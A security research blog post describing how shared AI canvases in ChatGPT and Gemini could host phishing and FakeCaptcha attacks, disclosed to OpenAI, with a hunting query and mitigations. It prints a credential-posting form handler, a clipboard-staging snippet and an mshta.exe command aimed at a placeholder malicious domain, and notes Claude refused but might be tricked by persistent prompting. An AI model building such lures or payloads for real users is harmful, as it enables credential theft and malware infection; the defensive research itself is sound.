
From Helper to Adversary: The Dual-Use Risks of AI Canvases

Jan 27, 2026
By: Yasin Tas

Adversaries are becoming more creative by the day, constantly seeking new ways to misuse emerging technologies. That’s why the Eye Security Research team set out to investigate a potential attack vector that, to our knowledge, has not yet been observed in the wild.

Back in October 2024, ChatGPT introduced a feature called canvas, enabling users to create interactive React or HTML projects directly within the platform. While this functionality opens exciting possibilities for developers, it also raises an important question: could threat actors misuse these canvases for malicious purposes, such as hosting clickjacking or phishing attacks?

Since we haven’t seen any real-world cases or public reports of adversaries exploiting ChatGPT canvases, we approached this as a hypothetical threat-hunting exercise. In this article, we take you behind the scenes of our research journey, exploring what is possible, what is not, and how this feature could potentially be weaponised if left unchecked.

Before diving into the attack scenario, let’s explain how we arrived at this hypothesis. It all started with a Huntress report of macOS malware spreading through SEO poisoning, where the top Google result was a shared ChatGPT link. This raised an important question: which online AI platforms allow users to share content publicly? Our investigation led us to several platforms with sharing capabilities, including but not limited to:

  • DeepSeek
  • Claude.ai
  • ChatGPT
  • Google Gemini (formerly Google Bard)
  • Grok

Next, we wanted to know whether users actually share these links via email or other platforms. To our surprise, they do, and quite frequently. While digging deeper, we stumbled upon a shared canvas. Visiting the link revealed something interesting: users were sending HR surveys and the like through these canvases. At first glance, they looked simple and harmless.

But that sparked an idea. What if we could make these canvases more convincing and trick unsuspecting users into executing commands or entering credentials?

We then examined which platforms support canvas creation. Out of the list, only two platforms stood out: ChatGPT and Google Gemini. With this knowledge, we began testing the boundaries, exploring what can and cannot be done with these AI-powered canvases.

Gemini

First, we started with Google Gemini. We gave it a simple prompt:

Generate a login screen

Gemini responded impressively, providing a clean and professional-looking login screen:

Login page for Canvas UI with the slogan 'Turn your ideas into reality.' including fields for email and password, and sign-in options through Google or GitHub.
Image 1. AI-generated login screen by Gemini

We almost fell for it ourselves. Before making any modifications, we simply shared the link and copied it over to the target machine. When a link is shared through Google Gemini, it follows this format:

https://gemini.google.com/share/UID

When opened, the user is greeted with a clear warning pop-up:

A warning message indicating the app was created by another person, alerting users to exercise caution and keep personal information private. It includes a button to continue and a suggestion to try Gemini.
Image 2. User warning that the content was created by another person

While we can’t predict the exact behaviour of end users, we suspect this warning is strong enough to make most users close the window immediately. Because of this limitation, we decided to move on to our next target: ChatGPT. Let’s see how that platform handles shared canvases.

ChatGPT

When we repeated the same steps with ChatGPT, the results were… disappointing, to say the least. The canvas and login screen it generated lacked almost everything you’d expect from a modern design. The padding was off, the layout felt clunky, and honestly, it looked like something straight out of the 90s.

So we thought: why not combine the strengths of both platforms? That’s exactly what we did. We took the HTML code generated by Gemini and pasted it into ChatGPT to see how it would handle it.

Next, we shared the ChatGPT canvas link, which follows this format:

https://chatgpt.com/canvas/shared/UID

Login screen with a welcome back message, input fields for email and password, and a sign-in button.
Image 3. ChatGPT shared canvas of a login screen

However, when the link is opened, the user is not actively warned that the content was created by someone else. There is only a small note at the top indicating that the content was generated by a user, and realistically most end users are unlikely to notice or read it.

So, we continued with the experiment: what happens if we try to add a callback domain that sends credentials to an external server outside of ChatGPT’s environment?

We added a simple testing callback to:

https://127.0.0.1/submit

When the user clicks Submit, the form sends a POST request to localhost.
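For illustration, the wiring behind this is an ordinary form handler. Below is a minimal sketch of what we added, where the form selector and the endpoint are our own test values rather than anything ChatGPT provides:

// Sketch: intercept the login form submit and POST the fields to our test endpoint.
const form = document.querySelector('#login-form') as HTMLFormElement;
form.addEventListener('submit', async (event) => {
  event.preventDefault(); // keep the page in place
  const fields = new FormData(form); // picks up the email and password inputs
  await fetch('https://127.0.0.1/submit', { method: 'POST', body: fields });
});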

Login form displaying fields for email and password, with a 'Failed to fetch' message and a 'Sign In' button.
Image 4. User entering credentials

When the user hits Submit, they are prompted to allow internet access. At this point, a user could simply click Allow, which would send their credentials over the internet through this canvas. However, our hypothesis is that most users will not grant access because of the warning message:

“If you don’t recognize this, don’t allow this app access to the network.”

Pop-up dialog asking for permission to allow network access, showing the message: 'Login Screen is trying to connect to the network.' Includes options to Deny or Allow, and a URL: 'http://127.0.0.1/submit.'
Image 5. Warning of the external connection

Since credential phishing wasn’t feasible, we decided to try a FakeCaptcha attack. We made a few changes to our code and hosted a FakeCaptcha attack disguised as an HR survey:

Illustration of an employee HR survey verification screen with a checkbox for confirming 'I'm not a robot'.
Image 6. FakeCaptcha disguised as an HR survey

We chose the HR survey theme because it is a common scenario: many end users are accustomed to receiving HR-related surveys via email. When the user clicks the checkbox to “verify” their identity, they are prompted with the following:

Screenshot of an employee HR survey verification page with 'I'm not a robot' checkbox and instructions for completing verification steps.
Image 7. User trying to verify their identity

Surprisingly, the canvas allows us to copy content directly to the user’s clipboard. When we press Windows + R, we can see the copied command displayed in the dialog box, ready to execute.

mshta.exe https://<MALICIOUSDOMAIN.TLD> # ✅ 'I am not a robot - reCAPTCHA Verification ID: 2101'
Screenshot of an Employee HR Survey verification step, featuring instructions to verify identity by following three steps on a Windows computer.
Image 8. Run box with the copied content from the ChatGPT canvas

As we can see, the attack worked.
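The copy itself requires nothing exotic. As a minimal sketch, assuming a checkbox element ID of our own choosing, the handler only needs the browser’s Clipboard API (the write is permitted because the click counts as a user gesture):

// Sketch: stage the payload on the clipboard when the fake checkbox is ticked.
const payload =
  "mshta.exe https://<MALICIOUSDOMAIN.TLD> # ✅ 'I am not a robot - reCAPTCHA Verification ID: 2101'";
document.querySelector('#captcha-checkbox')?.addEventListener('click', () => {
  // writeText returns a Promise; error handling is omitted in this sketch.
  void navigator.clipboard.writeText(payload);
});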

FakeCaptcha remains one of the most prevalent attack techniques we observed in 2025, a trend supported by CrowdStrike’s Global Threat Report. In this case, we used the canvas functionality within ChatGPT to execute the attack scenario successfully.

We reported this feature to OpenAI, highlighting its potential for malicious misuse. OpenAI reviewed the report through their bug bounty program and concluded that it falls outside their scope, as the issue relates to phishing rather than a technical vulnerability.

Noteworthy candidate – Claude.ai

Claude is another noteworthy candidate for this hypothetical attack because of its Artifacts feature. Artifacts allow you to host and run code directly within the platform. However, there’s an important caveat: Claude doesn’t let you freely edit the code yourself. Instead, you must prompt Claude to make any changes.

When we attempted the same attack, Claude immediately scanned our code for malicious patterns and refused to modify it in a way that would enable hosting something harmful. This proactive security measure is commendable. That said, we believe that with enough persistence and creative prompting, it might still be possible to trick Claude into generating or hosting malicious code.

Key takeaways

This experiment highlights a critical point: platforms that allow public hosting and sharing of adjustable frontends, such as JSFiddle or emerging code-sharing services, offer convenience and creative freedom, but they also introduce significant security risks.

The concern is not limited to ChatGPT but applies broadly to any service enabling public HTML sharing without clear warnings or safeguards. Features like link sharing and interactive code execution must be carefully designed to prevent misuse and protect users.

Hunting methodology

To identify shared links originating from email or messaging platforms such as Outlook or WhatsApp, you can use the following LogScale (CrowdStrike NG-SIEM) query. It detects browser processes whose command lines contain URLs and filters for the domains and paths of interest:

#event_simpleName=ProcessRollup2 ImageFileName=/(\/|\\)(?<ChildFileName>\w*\.?\w*)$/ ChildFileName=/(chrome|firefox|iexplore|msedge|opera|brave|browser|DuckDuckGo|zen)\.exe/i CommandLine=/https:\/\/(?<Domain>[^\/]+)(?<Path>\/[^\s]+)/ 
| Url := format("https://%s%s", field=["Domain", "Path"])
| in(field="Domain", values=["chatgpt.com", "grok.com", "chat.deepseek.com","gemini.google.com", "claude.ai"])
| in(field="Path", values=["*share*", "*artifacts*"])
| ExecutionChain := format(format="%s\n\t└ %s (%s)", field=[ParentBaseFileName, FileName, RawProcessId])
| table([@timestamp, ComputerName, ExecutionChain, Url, UserName, TargetProcessId, cid, aid])

Explanation of the query

This LogScale query is designed to hunt for processes that opened URLs from specific domains and paths using common web browsers. Here’s what each part does:

  1. #event_simpleName=ProcessRollup2
    Filters for process execution events.
  2. ImageFileName=/(\/|\\)(?<ChildFileName>\w*\.?\w*)$/
    Extracts the executable name from the process path.
  3. ChildFileName=/(chrome|firefox|iexplore|msedge|opera|brave|browser|DuckDuckGo|zen)\.exe/i
    Matches common browser executables (case-insensitive): Google Chrome, Firefox, Internet Explorer, Microsoft Edge, Opera, Brave, Yandex Browser (browser.exe), DuckDuckGo and Zen.
  4. CommandLine=/https:\/\/(?<Domain>[^\/]+)(?<Path>\/[^\s]+)/
    Captures URLs from the command line, splitting them into Domain and Path.
  5. Url := format("https://%s%s", field=["Domain", "Path"])
    Reconstructs the full URL from the captured parts.
  6. in(field="Domain", values=[...])
    Filters for the AI chat platform domains of interest (ChatGPT, Grok, DeepSeek, Gemini, Claude).
  7. in(field="Path", values=["*share*", "*artifacts*"])
    Filters for paths indicating shared content or artifacts.
  8. ExecutionChain := format(...)
    Creates a readable chain showing the parent and child processes.
  9. table([...])
    Displays relevant fields such as timestamp, computer name, execution chain, URL, username, and process IDs.

How to protect against this attack

There are a number of measures you can take to better protect against this type of attack. Below are the most effective ones.

Run regular user awareness training and phishing simulations

It is crucial for organisations to create a culture of security awareness. Train users to recognise FakeCaptcha attacks and malicious webpages.

Deploy endpoint detection and response (EDR)

Not all EDRs are great at detecting ClickFix attacks. An adversary who has gone to the trouble of creating this attack is unlikely to rely on easily detectable commodity malware. It is therefore important for organisations to have a well-configured EDR solution, such as the market-leading CrowdStrike Falcon, Defender for Endpoint (P2) or SentinelOne. Even in a sophisticated attack, the threat actor’s actions will produce behaviours that trigger alerts. Note that the EDR must be deployed on as many systems as possible for effective protection.

Investigate all alerts

When an EDR generates an alert, an expert security operations (SecOps) analyst should investigate it. Follow-up is necessary to establish what happened, how it occurred, how to prevent it, and how to remove any remnants of the action or infection. If no one investigates, the infected endpoint will not be discovered. It is not unusual for threats to remain undiscovered for weeks, if not months, during which time a threat actor can move further into the network.

Disable the Run dialog box

The best way to prevent ClickFix attacks is to disable the Run dialog box through Group Policy or via a registry key on endpoints. For the registry route, create a DWORD value named NoRun and set it to 1 under HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer (a one-line example follows the steps below). If you prefer Group Policy, go to:

  • User Configuration > Administrative Templates > Start Menu and Taskbar.
  • Double-click “Remove Run menu from Start Menu”.
  • Select Enabled, click Apply, then OK.
  • Restart your computer for changes to take effect. 
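If you want to script the registry route instead, a single command sets the value for the current user (shown as an example; test it before rolling it out, and note that the change only takes effect after the user signs in again):

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f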

Make sure your SIEM system is well configured

A Security Information and Event Management (SIEM) system is a crucial component of any organisation’s cybersecurity strategy. It centralises security data from multiple sources, including endpoints, servers, cloud and applications, to monitor IT infrastructure, detect anomalies in real time, and maintain detailed logs of all events.

A good SIEM can help detect both known and unknown threats, providing fine-grained, real-time visibility into on-premises and cloud-based activities. It uses correlation rules and statistical algorithms to extract actionable information from events and log entries.

Various SIEMs ship with built-in detection rules, including LogScale, Microsoft Sentinel, Elastic Security and Splunk.

License a managed detection and response service (MDR)

Deploying tools like a SIEM helps reduce the likelihood of a threat actor progressing their attack once they have successfully compromised an endpoint. However, you still require SecOps experts to make best use of these tools. Many organisations are finding that building a security operations centre (SOC), staffing it, and licensing the tools required is cost-prohibitive. So they turn to third-party managed security services or MDR providers.

MDR services provide organisations of all sizes, across any industry, with a remote SOC staffed by highly skilled SecOps professionals on a 24/7 basis. Their main goal is to monitor specific products in their customers’ infrastructures and detect, respond to, and contain an in-progress cyber attack that has evaded their primary defences.